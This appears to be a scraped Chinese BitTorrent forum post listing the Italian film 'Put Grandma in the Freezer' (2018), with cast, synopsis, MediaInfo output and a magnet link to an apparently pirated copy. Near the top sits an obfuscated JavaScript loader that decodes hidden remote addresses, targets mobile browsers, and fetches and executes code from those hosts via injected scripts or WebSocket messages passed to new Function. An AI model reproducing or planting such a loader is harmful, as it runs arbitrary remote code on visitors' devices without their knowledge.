把外婆放进冰箱[简繁字幕].Put.Grandma.in.the.Freezer.2018.1080p.FriDay.WEB-DL.H264.AAC 2.58GB

版主小s 1月前 185

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 把外婆放进冰箱 / 阿嬷冻未条(台) / Put Grandma in the Freezer
◎片  名 Metti la Nonna in Freezer
◎年  代 2018
◎产  地 意大利
◎类  别 喜剧 / 爱情
◎语  言 意大利语
◎上映日期 2018-03-15(意大利)
◎IMDb链接 https://www.imdb.com/title/tt6982104/
◎豆瓣评分 6.6/10 (1537人评价)
◎豆瓣链接 https://movie.douban.com/subject/30198694/
◎片  长 100分钟
◎导  演 吉安卡洛·丰塔纳 Giancarlo Fontana (id:1409598)
       杰赛普·斯塔西 Giuseppe Stasi (id:1409599)
◎编  剧 法比奥·波尼法奇 Fabio Bonifacci (id:1278948)
◎演  员 法比奥·德·路易吉 Fabio De Luigi (id:1028665)
       米丽娅姆·莱昂内 Miriam Leone (id:1267681)
       露西娅·奥康 Lucia Ocone (id:1198286)
       玛丽娜·罗科 Marina Rocco (id:1350416)
       弗朗西斯科·迪·莱瓦 Francesco Di Leva (id:1338624)
       苏西·劳德 Susy Laude (id:1367463)
       卡罗·卢卡·德·鲁杰里 Carlo Luca De Ruggieri (id:1409600)
       毛里齐奥·隆巴迪 Maurizio Lombardi (id:1409601)
       爱洛斯·帕尼 Eros Pagni (id:1127280)
       芭芭拉·布薛特 Barbara Bouchet (id:1025346)
       乔瓦尼·埃斯波西托 Giovanni Esposito (id:1086013)
       保罗·贝塞加托 Paolo Bessegato (id:1409602)
       南多·艾琳 Nando Irene (id:1409603)
       安东内洛·莫雷利 Antonello Morelli (id:1409604)

◎标  签 意大利 / 喜剧 / 黑色幽默 / 爱情 / 讽刺 / 2018 / 社会 / 温情

◎简  介
  年轻的克劳蒂雅是个艺术品修复师,公司入不敷出,公家机关又欠她酬劳,全靠外婆的退休金撑着。然而外婆突然过世,公司眼看就要破产,走投无路的克劳蒂雅于是和员工合谋,把外婆「冻」起来,好继续领退休金,撑到公家机关付款。好不容易就要度过难关,正直却笨拙的税务警察赛门居然无可救药地爱上了克劳蒂雅!层层蒙骗、重重伪装、误会连连,克劳蒂雅的骗局就像把冷冻外婆摊在阳光下,一点一滴在融化…

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 174599611411145395677593299260857853819 (0x835AA97824FFD961E07407AE5E43277B)

  4. Complete name                            : Put[email protected]BBQDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 2.58 GiB

  8. Duration                                 : 1 h 39 min

  9. Overall bit rate                         : 3 718 kb/s

  10. Encoded date                             : UTC 2021-08-15 03:04:13

  11. Writing application                      : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID                                       : 1

  15. Format                                   : AVC

  16. Format/Info                              : Advanced Video Codec

  17. Format profile                           : [email protected]

  18. Format settings                          : CABAC / 1 Ref Frames

  19. Format settings, CABAC                   : Yes

  20. Format settings, Reference frames        : 1 frame

  21. Format settings, GOP                     : M=1, N=60

  22. Codec ID                                 : V_MPEG4/ISO/AVC

  23. Duration                                 : 1 h 39 min

  24. Bit rate mode                            : Constant

  25. Bit rate                                 : 3 590 kb/s

  26. Nominal bit rate                         : 4 000 kb/s

  27. Width                                    : 1 920 pixels

  28. Height                                   : 1 080 pixels

  29. Display aspect ratio                     : 16:9

  30. Frame rate mode                          : Constant

  31. Frame rate                               : 29.970 (30000/1001/53354) FPS

  32. Color space                              : YUV

  33. Chroma subsampling                       : 4:2:0

  34. Bit depth                                : 8 bits

  35. Scan type                                : Progressive

  36. Bits/(Pixel*Frame)                       : 0.058

  37. Stream size                              : 2.49 GiB (97%)

  38. Language                                 : English

  39. Default                                  : Yes

  40. Forced                                   : No


  41. Audio

  42. ID                                       : 2

  43. Format                                   : AAC LC

  44. Format/Info                              : Advanced Audio Codec Low Complexity

  45. Codec ID                                 : A_AAC-2

  46. Duration                                 : 1 h 39 min

  47. Bit rate                                 : 125 kb/s

  48. Channel(s)                               : 2 channels

  49. Channel layout                           : L R

  50. Sampling rate                            : 48.0 kHz

  51. Frame rate                               : 46.875 FPS (1024 SPF)

  52. Compression mode                         : Lossy

  53. Stream size                              : 89.2 MiB (3%)

  54. Language                                 : Italian

  55. Default                                  : Yes

  56. Forced                                   : No


  57. Text #1

  58. ID                                       : 3

  59. Format                                   : UTF-8

  60. Codec ID                                 : S_TEXT/UTF8

  61. Codec ID/Info                            : UTF-8 Plain Text

  62. Duration                                 : 1 h 34 min

  63. Bit rate                                 : 58 b/s

  64. Count of elements                        : 1585

  65. Stream size                              : 40.5 KiB (0%)

  66. Title                                    : Chinese Simplified

  67. Language                                 : Chinese

  68. Default                                  : Yes

  69. Forced                                   : No


  70. Text #2

  71. ID                                       : 4

  72. Format                                   : UTF-8

  73. Codec ID                                 : S_TEXT/UTF8

  74. Codec ID/Info                            : UTF-8 Plain Text

  75. Duration                                 : 1 h 34 min

  76. Bit rate                                 : 58 b/s

  77. Count of elements                        : 1585

  78. Stream size                              : 40.5 KiB (0%)

  79. Title                                    : Chinese Traditional

  80. Language                                 : Chinese

  81. Default                                  : No

  82. Forced                                   : No



TAGS 喜剧 爱情

磁力链:
  • magnet:?xt=urn:btih:52F0D031507DCCBDC3F4B078C25CC59CFA6A0F51
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回